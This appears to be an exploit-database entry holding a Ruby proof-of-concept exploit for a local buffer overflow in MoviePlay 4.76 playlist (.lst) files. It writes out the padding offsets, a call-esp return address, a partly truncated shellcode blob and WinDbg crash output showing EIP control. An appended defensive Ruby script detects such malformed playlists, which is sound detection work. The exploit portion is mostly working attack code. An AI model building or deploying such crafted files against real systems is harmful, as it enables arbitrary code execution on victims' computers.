MoviePlay 4.76 - '.lst' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-0016  
Publish Date: 08 Jun 2007
Author: n00b

#!/usr/bin/env ruby
# MoviePlay 4.76 .lst file local buffer overflow.
# Credit to n00b for writing the PoC code..Pmsl
# Tested on: Win XP SP2 eng.
# Vendor web site: MoviePlay 4.76
# Buffer overflow reported: Jan 02 2007 12:00AM
# Credit goes to Parvez Anwar for finding the bug.
# MoviePlay is prone to a remote buffer-overflow vulnerability because it
# fails to properly bounds-check user-supplied input before copying it to
# an insufficiently sized memory buffer. Exploiting this vulnerability
# allows attackers to execute arbitrary machine code in the context of
# the affected application.
# I looked all over for a PoC code or even something to back the claim up;
# nothing was found, and as I was bored I decided to write a PoC for this.
# 1053 bytes, then the next 4 bytes overwrite EIP; ESP was pointing
# 4 bytes after, so no need for any NOP sled or anything...
# 1053 bytes of buffer --> 4 bytes ret --> 351 bytes shellcode --> 592 bytes of buffer.
# File is 2000 bytes.
# ..\\Debug info//..
# (664.3b0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=ffffffff ebx=00000000 ecx=41414141 edx=0048ef90 esi=00b00048 edi=00000001
# eip=41414141 esp=0012ec78 ebp=41414141 iopl=0 nv up ei ng nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010296
# 41414141 ?? ???
# Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre

Header1 = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c" # "[MoviePlay]\r\nFil" (rest of the header is truncated in this copy)

bof1 = 'A' * 1053 # 1053 bytes until EIP is overwritten

ret = "\x45\x15\xF6\x77" # call esp in Shlwapi.dll, 0x77F61545

# Calc shellcode (351 bytes in the original; only the first 16 survive in this copy)
shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

bof2 = 'B' * 592 # 592 bytes to fill the rest of the file up to 2000 bytes

Header2 = "\x2e\x6d" # ".m" (rest of the extension is truncated in this copy)

lst_file = Header1 + bof1 + ret + shell + bof2 + Header2
# Write the file in binary mode so the CR/LF bytes in the header are not translated
File.open("Exploit.lst", "wb") do |the_file|
  the_file.write(lst_file) # write, not puts, so no extra newline is appended
end
print 'File was created successfully..!!'
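As an added defender-side example (not part of n00b's PoC), the Ruby check below flags .lst playlists shaped like the file the script above writes: an oversized entry, non-printable bytes where a path belongs, and long runs of one padding byte. The "File1=" key name and the 260/64 thresholds are assumptions, and the sample inputs are constructed.

```ruby
# Added triage check (not part of n00b's PoC): flag MoviePlay-style ".lst"
# playlists whose entries look like an overflow payload rather than a path.
# A legitimate playlist is a short INI-like text file ("[MoviePlay]" section,
# one "key=path" line per entry); the key name and thresholds are assumptions.
MAX_ENTRY_LEN = 260 # assumption: Windows MAX_PATH; the PoC entry is ~2000 bytes
MAX_RUN_LEN   = 64  # assumption: no real path repeats one byte this often

# Returns an array of human-readable findings (empty when the file looks benign).
def lst_findings(data)
  findings = []
  data.b.split(/\r?\n/).each_with_index do |line, idx|
    n = idx + 1
    if line.bytesize > MAX_ENTRY_LEN
      findings << "line #{n}: entry is #{line.bytesize} bytes (> #{MAX_ENTRY_LEN})"
    end
    # Bytes outside printable ASCII never belong in a path; in a payload they
    # are the return address and machine code.
    if line =~ /[^\x20-\x7e\t]/n
      findings << "line #{n}: contains non-printable bytes"
    end
    # A long run of one repeated byte is the padding used to reach the saved
    # return address (the 'A' * 1053 and 'B' * 592 blocks in the PoC).
    line.scan(/((.)\2{#{MAX_RUN_LEN - 1},})/n).each do |whole, byte|
      findings << "line #{n}: #{whole.bytesize} repeated #{byte.inspect} bytes"
    end
  end
  findings
end

def suspicious_lst?(data)
  !lst_findings(data).empty?
end

# Constructed sample inputs (not taken from the page).
BENIGN_LST = "[MoviePlay]\r\nFile1=C:\\Movies\\holiday.mpg\r\nFile2=D:\\clips\\intro.avi\r\n".b
# Same layout as the file the PoC writes (1053 padding, 4-byte return address,
# payload, 592 padding, extension) with the payload replaced by inert bytes.
POC_SHAPED_LST = ("[MoviePlay]\r\nFile1=" + "A" * 1053 + "\x01\x02\x03\x04" +
                  "\x05" * 16 + "B" * 592 + ".mpg\r\n").b

if __FILE__ == $0
  { "benign" => BENIGN_LST, "poc-shaped" => POC_SHAPED_LST }.each do |name, data|
    puts "#{name}: #{suspicious_lst?(data) ? 'SUSPICIOUS' : 'ok'}"
    lst_findings(data).each { |f| puts "  - #{f}" }
  end
end
```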

# [2007-06-08]